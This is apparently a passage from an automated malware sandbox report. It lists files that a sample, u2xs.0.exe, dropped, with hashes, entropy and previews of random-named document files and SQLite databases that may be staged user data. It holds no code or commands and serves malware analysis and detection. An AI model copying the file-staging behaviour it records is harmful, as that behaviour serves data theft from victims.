File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696057287339164
Encrypted:	false
SSDEEP:	24:niOn2XUWQpWDCNuXXIOSQ6ZB6jvRs8Oai/JtGbrMHX:iO21QpWDCNunIOSsj5s8OX/KM3
MD5:	F3D91244406247D2AE105C749EDE23E2
SHA1:	4BCB989983E7A2355C956E3784DEC81C84665C5B
SHA-256:	9FC95D18A114E6323D3B5197B6AB59C9FDABC284808BF4F7E568565D0005F0B6
SHA-512:	DE7835632A068E39A616448B360054C0AE42371B47F1A8DCEAACAA382A34D8F002F3877E38E49AD78244928F7F971F84BF54C97B676994561E26CE27687DAF27
Malicious:	false
Reputation:	unknown
Preview:	ATJBEMHSSBUDUNEEISUOHNWSYPLDCDKZCDKNETRCICVQMGQUSBYROWUDOWYUZHFRDEDQYSWBQBBPQWYZAJODUMCBRJVBIXEGDSIHJPMKSIIARQHQBNQXRVLNLLNSEPFTOIGIFOUQNIPSCQUKVVKFSAQLTFUQJRLYTXIJAQUSJUAMBBTFPPTTQDGYJUQVDNLBUWFRLOHAAFLEMYCZDQAKYDZKIFRZALYOFCYWPHOZTLKMITIXIRNYHUGDJWWSSDRRKHFNDHIMVUSDVBNTRHDVJBAZZXJTADVPLSPIATYXJBJTJLEJXMCLLUITBHVIKREXCIMBAGSKEIRRALZFZLWXQBUOWNEPIPTZGNZGUBURPJSKFZEJIIDSGVOTQPYSAWAKSHZXDSBOXPVNKDBLMRNPHAJOVOIQHTEVFJBLNFYHQYCTFCIEYXYKDWRSSDRNZINREIYYDIDRHSPJZTMSBVEWJXCXGVSHNDZJKBJZPZPJPAWKLWTQZJEKGRJYRMJEIPTCBNVMZRUPDWIBGQPUQZHZBOMOSTKWZYXHIYAVSYDUAHMJFTGTTFVGRZNMSSRACJZKAOEILAHWDMDUVZNBKJLOFDKOZXWQBQKZYTLWUFQLKWYTIXBHDBLFEVJCUBMJQGFERLSGLRNGOTCCIGCDRCWREHCWNUCIJGCLHOUZUTCZQGKYCOCINKOJJKEFQNCOASRWTLQNZQTDFADDFSLJHCKVPUTVQYNCKZVPAXLDEZDCKKTVRZOTZOTKWZDBQSCJCJHKKOPKUYKFVBHSZZLECGFEVYQNKJPIDEBPFRBVHZYZTSHENJXPYAZWUJZXJKIYCQASEGMHBWUPHYHISPCKJIXJJJXJIAXESVYQOAWCVRGMYTIKSSCQGHWWYCIGJXXYHXWOQEIOTTQURFHSAFRWKBDFWALIPDEEPSSNZCQAZMLVMMAMVPANQRTUUYXXGIMXOPJTDRXPZLNVFYLBACFYFTJPRFCSAKGAEJTGOMSUMXCD

C:\ProgramData\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Reputation:	unknown
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\ProgramData\BKJEGDGIJECGCBGCGHDGIEGCBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGIDGCGIEGDGDGDGHJKKKJKECG

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Reputation:	unknown
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\ProgramData\EEGWXUHVUG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Reputation:	unknown
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\ProgramData\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Reputation:	unknown
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Reputation:	unknown
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\ProgramData\FCBAECGIEBKKFHIDAKEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIECBFID

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGCFCBAKKFBFIECAEBAEBGCGD

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGHCBKFCFBFHIDHDBFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIECFHDB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJKFBKKECFHJKEBKEHIDAEBKF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8775877546687164
Encrypted:	false
SSDEEP:	3072:gJjJGtpTq2yv1AuNZRY3diu8iBVqFIvpL:hpezNZQd58iXpL
MD5:	683F49AEE2CD50148BDFFBC7D8E8B096
SHA1:	88A56B3E3BE563A167FED78885399EBFABB2B350
SHA-256:	6B84A2A1A96631FBF50B37A82C196BD21FE7F1416F324C51B5E420C5FCC66AE2
SHA-512:	94F3CACD2E3C98467E3B836C062F37529CCFFEF538FBF599552F0E98FC75AF386019BB94310572846FA839D9F452FC2F70490E6CBE35D4DBE92B95774222C5C5
Malicious:	false
Reputation:	unknown
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xde84ae3f, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6586248829539538
Encrypted:	false
SSDEEP:	1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	A95C51E80D17557E853DE03845A31441
SHA1:	BE0279D986AB6C68F864BA993E7823C20290F376
SHA-256:	01BF02EC62980E770071C1A8277EC0DA231C9E2455AB9C08C0202275D302BD25
SHA-512:	CF3667118FE95C0028B5C2F313A9ED1367E66D52A3B0063163C7CD6FBADA2D7FA9BEA1718DD1B0EAA2B5B2DE8F5ACD2B06CE0B9AFC74CEFDFFC64FDD55B14C66
Malicious:	false
Reputation:	unknown
Preview:	..?... ...............X\...;...{......................0.z..........{.......\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...........................................\|.....................F.....\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08125062815770501
Encrypted:	false
SSDEEP:	3:DmKYeMl3cjbltGuAJkhvekl1hOIij/XollrekGltll/SPj:yKzy3yltrxljOIAIJe3l
MD5:	FA49A36D25BCDC8ED953934266562FE1
SHA1:	F11674A71FE99839307E223012DAF8B7D348A4FB
SHA-256:	FEA6DFB322D971C09DDAD1590797999F901191C6274E8E1C0161C92705B46558
SHA-512:	7EF299A756E86787E94A401A291529954BA524FC14B8B3026A77D97A29D4BFA1C17B4129F660551BE3A004B03F9E4A0DCB094715DF2B3AE403ADCBF329160C7A
Malicious:	false
Reputation:	unknown
Preview:	.Y.......................................;...{.......\|.......{...............{.......{...XL......{.....................F.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_i1.exe_c02ec481c09e7831ff85bf9f8df2d39985ea1cb_24622bb6_851306bb-3049-4b78-87a4-d0d3d9f59764\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
